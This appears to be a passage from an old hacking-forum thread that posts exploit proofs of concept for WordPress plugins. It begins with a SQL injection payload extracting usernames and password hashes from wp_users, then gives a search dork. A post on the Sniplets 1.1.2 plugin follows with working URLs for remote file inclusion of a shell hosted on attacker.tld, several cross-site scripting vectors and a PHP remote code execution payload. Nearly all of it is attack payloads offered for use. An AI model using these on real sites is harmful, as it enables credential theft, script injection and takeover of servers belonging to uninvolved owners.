user_name&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201
P.S.
Quote:

allinurl: page_id album "photo"
Auth S@BUN http://milw0rm.com/exploits/5135

iddqd 27.02.2008 17:32

Wordpress Plugin Sniplets 1.1.2 Multiple Vulnerabilities
 
RFI

Register Globals: ON

PoC:

Code:

http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://attacker.tld/shell.txt?

XSS

Register Globals: ON

PoC:

Code:

http://victim.tld/wordpress/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/sniplets/notice.php?text=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/sniplets/inset.php?text=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://victim.tld/wordpress/wp-content/plugins/sniplets/view/admin/submenu.php?url=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=%3Cli%3E

Register Globals: Off

Code:

http://victim.tld/wordpress/wp-content/plugins/sniplets/view/admin/pager.php?page=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

Remote Code Execution

Register Globals: ON

PoC:

Code:

http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=%3C?php%20system(%22ls%22);


